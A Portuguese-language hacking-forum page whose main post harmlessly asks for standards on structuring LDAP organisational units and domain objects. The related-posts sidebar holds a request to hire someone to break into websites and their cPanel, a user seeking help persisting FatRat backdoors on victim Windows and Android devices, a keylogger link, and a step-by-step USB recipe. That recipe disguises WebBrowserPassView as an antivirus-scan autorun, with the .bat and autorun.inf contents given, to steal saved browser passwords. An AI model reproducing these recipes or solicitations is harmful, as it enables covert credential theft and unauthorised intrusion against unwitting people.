Ir para conteúdo
thdr

Como desenvolver uma estrutura padronizada de objetos de domínio no LDAP

Recommended Posts

Boa tarde galera, alguém conhece alguma RFC ou tem algum material ou método de padronização para desenvolver uma estrutura de unidades organizacionais e objetos de domínio no LDAP ?, Obrigado desde já !!

Compartilhar este post

Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

• Conteúdo Similar

• Por Anonimaaprendiz
      Procuro profissional que esteja interessado em ganhar um extra 
      preciso de invasão de alguns sites e o cpanel dele adm etc

pago pelo serviço 
    • Por EXT
      Eae meu povo.
      Geralmente não tem muitos post  voltados para Windows por aqui, então,  estava fazendo uma pesquisa rápida e decidi deixar alguns links bacanas sobre o PowerShell.
      Para quem não  tá ligado, o PowerShell é como um CMD da vida, mas funciona de forma mais robusta, e também tem melhorias.
      Vamos aos links:
      >>>>Introdução - PowerShell<<<<
      >>>>Diferença entre Bash e PowerShell<<<<
      >>>>Visão Geral<<<<
      >>>>Curso rápido<<<<
      (rápido mesmo)
      Sobre os comandos você pode dar uma pesquisada melhor por ai, é isso ae! 
    • Por shaka
      Alguém ai pode ajudar, criei 2 backdoors 1 pra WIN, 1 pra ANDROID. Usei o FatRat, consegui instalar em 2 WIN 10 e um ANDROID... peguei as sessões de boa.
      No Android injetei o script de persistence e no windows executei o comando de persistence... mas acontece q nenhum deles vingou.
      Estou usando NO-IP configurei tudo certo...
      No WIN será q foi o Windows Defender que removeu o Backdoor?
      E é possivel q algum anti-virus tenha removido?
    • Por EXT
      Olá amigos.
      Trago hoje uma ferramenta para "roubar" as senhas dos navegadores que estão salvos.
      A ferramenta para download está disponível no site oficial (Nirsoft - WBPS) - Download no fim da página.
      1° - Formate seu  pendrive para o formato NTFS. 
      2° - Crie uma pasta com o nome que quiser, ou como  padrão "usb" :v.
      (Observação, se colocar outro nome, vai ter que mudar o caminho no arquivo .bat)
      3° - Passe o arquivo executável que foi baixado no arquivo .zip e passe para essa pasta.
      4° - Crie um arquivo de texto e cole isso aqui: 
      @echo off cls start \usb\WebBrowserPassView.exe /shtml 1.html 4.1° - Salve o arquivo como: USBdriver.bat
      5° -  Crie um arquivo de texto e cole isso aqui: 
      [autorun] open=usbdriver.bat Action=Perform a virus Scan 5.1° - Salve o arquivo como: Autorun.inf
      Vai ficar assim:

Na hora que colocar, deixe-o escanear pelo antivírus e ele vai ser executado.  Se não for, clique abra o programa:

Deixei só uma senha gerada aleatória ali do lado (né :v)
      Bem, o site tem outras ferramentas relacionadas com senhas, estou testando elas por aqui e depois vou passando.
      (Outro ponto, acredito que a parte dos códigos nos arquivos, são para salvar automaticamente depois do escaneamento do antivírus, mas acho que só  clicando no programa já vai, testa ai. )
      Outra coisa bem importante, acho que deu para perceber que ele tem que estar logado, se necessário, use outras artimanhas para passar pela senha do  Windows. 
      ---
      Assim, não só pense no maligno kkk dá para usar isso quando algum conhecido esquecer uma senha salva.
      Isso ae  e.e
    • Por EXT
      Olá amigos.
      Um KeyLogger que cria arquivos para Windows (.exe) e manda as informações para seu email.
      (Mais informações no link, como tempo de envio de mensagem, entre outros)
      BeeLogger - GitHub

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.